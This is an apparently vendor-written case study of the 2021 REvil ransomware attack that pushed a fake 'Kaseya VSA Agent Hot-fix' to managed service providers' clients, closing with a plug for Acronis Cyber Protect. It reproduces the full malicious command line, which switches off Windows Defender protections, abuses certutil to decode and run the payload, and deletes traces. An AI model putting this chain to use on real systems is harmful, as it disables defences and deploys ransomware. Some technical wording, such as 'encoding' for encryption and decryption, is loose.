Abstract data and figures can illustrate the magnitude of the threat posed by cyber attacks. However, examining a specific case in detail really brings home exactly what’s at stake during a cyber attack and which precise steps can be taken to minimise the damage. In the following example, taken from the Acronis Cyber Threats Report, the target of the attack was a managed service provider (MSP) – an IT service provider that takes over or provides defined services on behalf of a customer. As MSPs manage the IT of around 100 companies on average, they are a particularly attractive target for criminals – who, rather than having to compromise 100 different companies, only need to hack one single MSP to gain access to all of its 100 customers.
In this particular attack, the REvil/Sodinokibi ransomware group succeeding in using Kaseya VSA IT management software, which is commonly used by MSPs, to distribute a malicious update that compromised the systems of service providers and customers.
Sequence of events
On the evening of 2 July 2021, hackers in the United States began to distribute the ransomware. The timing of the attack was very deliberately planned. Generally, at the start of any long weekend, companies have far fewer employees available than normal who are capable of detecting and taking action against a cyber attack.
The attack exploited the zero day security hole – a vulnerability that had been identified but had not yet been rectified with a patch. This defect allowed the criminals to bypass user authentication and access the Kaseya VSA management software, where they were then able to send their own error codes to the connected clients.
After first blocking administrator access to the VSA management software, the hackers pushed out a malicious update called “Kaseya VSA Agent Hot-fix” to the connected clients. The code (shown below) used in this update executed multiple PowerShell commands to lower the local security settings – leading, for example, to the deactivation of real-time monitoring and malware notifications.
C:\WINDOWS\system32\cmd.exe /c ping 127.0.0.1 -n 4223 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference – DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true – DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled – SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
One of the PowerShell commands also used the legitimate Certutil tool from Microsoft to decode the encoded malware file named “agent.crt”. The tool was initially copied to “C:\Windows\cert.exe”, where the decoded malware file “agent.exe” was placed in a temporary Kaseya folder and signed with a certificate. Next, the agent.exe placed the REvil encoding module and an old but clean Windows Defender binary file in the Windows folder as a “dropper”. Windows Defender launched, it retrieved the malicious data via a DLL sideloading vulnerability and the decoding began.
As the agent.exe was signed with a valid digital certificate and the malicious DLL file was loaded with a legitimate Windows Defender binary file, the security tools used by many MSPs were unable to detect the attack.
It’s virtually impossible to verify the claim made by the hackers in the REvil group that they successfully infected one million computers this way. What is certain is that the group demanded 70 million US dollars in exchange for a universal encoding program.
In any case, MSPs that were using Acronis Cyber Protect weren’t troubled by this demand. Thanks to its integrated and patented detection of process injections, the abnormal behaviour of Kaseya VSA was spotted immediately and the distribution of the malicious updates was stopped.